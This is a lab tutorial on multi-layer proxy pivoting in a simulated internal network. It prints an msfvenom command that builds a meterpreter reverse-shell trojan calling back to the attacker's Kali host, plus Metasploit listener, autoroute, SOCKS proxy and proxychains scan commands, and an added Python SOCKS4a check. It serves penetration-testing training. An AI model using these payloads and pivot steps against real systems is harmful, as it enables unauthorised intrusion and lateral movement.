Forward multi-layer proxy (internal network penetration)


Preparation

1. We need four virtual machines --- win10 (as the local host), kali (as the vps), win7 (as the jump box), win2012 (as the target machine)

2. We need to simulate an internal network host, so the virtual machine's network adapter is configured so that it cannot reach the Internet


Edit --> Virtual Network Editor --> Add Network


DHCP settings

The range here is arbitrary


3. All hosts use NAT mode

4. The jump box requires two network cards (one for outgoing Internet access (NAT), one for the internal network (12.12.12.0 subnet))

5. The target machine needs to open an http service using the Xiao Pi panel


Set up a tunnel proxy

win7 acts as the proxy: connecting to port 1080 on kali itself is equivalent to having win7 connect to port 80 on the target machine on our behalf


  1. kali generates a trojan for connecting to the jump box win7

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.250.129 LPORT=7777 -f exe > kali.exe
  2. kali opens a listener

    msfconsole
    set payload windows/meterpreter/reverse_tcp
    set lhost eth0
    set lport 7777
    run


  3. The trojan checks in

    Place the trojan in win7 to run

  4. Configure routing on the win7 session

    Make sure win7 can communicate with win2012, then add a route through the meterpreter session so that kali can reach the 12.12.12.0/24 subnet via win7

    run autoroute -p
    run autoroute -s 12.12.12.0/24
    run autoroute -p
    bg
    route print
  5. kali opens a tunnel

    use auxiliary/server/socks_proxy
    set version 4a
    run

    vim /etc/proxychains4.conf
    socks4 192.168.250.129 1080

  6. kali accesses the target machine

    proxychains nmap -sT 12.12.12.18 -p 80
    or
    proxychains firefox 12.12.12.18

If the browser cannot reach the page, it is enough to confirm that port 80 is open through the tunnel
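As an added example (not code from the original post), this is the SOCKS4a CONNECT handshake that the socks_proxy module and proxychains speak, so the tunnel can be checked against one port without proxychains; the proxy and target addresses are the ones used in this lab (192.168.250.129:1080 and 12.12.12.18:80), and the function names are assumptions of this example.

```python
import socket
import struct
from typing import Tuple

SOCKS4_GRANTED = 0x5A   # request granted
SOCKS4_REJECTED = 0x5B  # request rejected or failed (e.g. no route to the target)


def build_socks4a_connect(host: str, port: int, user_id: str = "") -> bytes:
    """Build a SOCKS4/4a CONNECT request for host:port.

    Layout: VN=4, CD=1 (CONNECT), DSTPORT (2 bytes, big-endian), DSTIP (4 bytes),
    USERID, NUL. SOCKS4a (what `set version 4a` selects) also allows a hostname:
    DSTIP becomes 0.0.0.x and the hostname follows the NUL, itself NUL-terminated.
    """
    try:
        dst_ip = socket.inet_aton(host)      # IPv4 literal: plain SOCKS4 request
        hostname_tail = b""
    except OSError:
        dst_ip = b"\x00\x00\x00\x01"         # 0.0.0.1 signals "hostname follows"
        hostname_tail = host.encode("idna") + b"\x00"
    return (b"\x04\x01" + struct.pack(">H", port) + dst_ip
            + user_id.encode() + b"\x00" + hostname_tail)


def parse_socks4_reply(data: bytes) -> Tuple[bool, int]:
    """Parse the 8-byte reply (VN=0, CD, DSTPORT, DSTIP); return (granted, code)."""
    if len(data) < 8 or data[0] != 0x00:
        raise ValueError("not a SOCKS4 reply: %r" % data[:8])
    code = data[1]
    return code == SOCKS4_GRANTED, code


def check_via_proxy(proxy_host: str, proxy_port: int,
                    target_host: str, target_port: int, timeout: float = 5.0) -> bool:
    """Ask the proxy to CONNECT to the target; True if the tunnel was granted.

    This is what `proxychains nmap -sT 12.12.12.18 -p 80` does for a single port:
    proxychains wraps connect() with exactly this handshake.
    """
    with socket.create_connection((proxy_host, proxy_port), timeout=timeout) as s:
        s.sendall(build_socks4a_connect(target_host, target_port))
        reply = s.recv(8)
    granted, _ = parse_socks4_reply(reply)
    return granted


if __name__ == "__main__":
    # Lab addresses from the walkthrough: kali's socks_proxy on 1080, target web server on 80
    print("12.12.12.18:80 reachable through the tunnel:",
          check_via_proxy("192.168.250.129", 1080, "12.12.12.18", 80))
```

Because proxychains only relays connect() calls, raw-socket scans such as nmap -sS and ICMP pings are not tunnelled, which is why the walkthrough uses -sT. A reply code of 0x5B means the proxy refused the connection, typically because no autoroute covers the target subnet.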

Access the target host through win10

  1. Enable a global proxy so that all of win10's traffic is sent through the socks proxy on the kali machine

    Download SocksCap (download the exe file only)

    https://github.com/bobo2334/sockscap64/releases

    Select No during installation

    Run exe

  2. Use burp locally to capture the packets

    Packet capture configuration

Completed


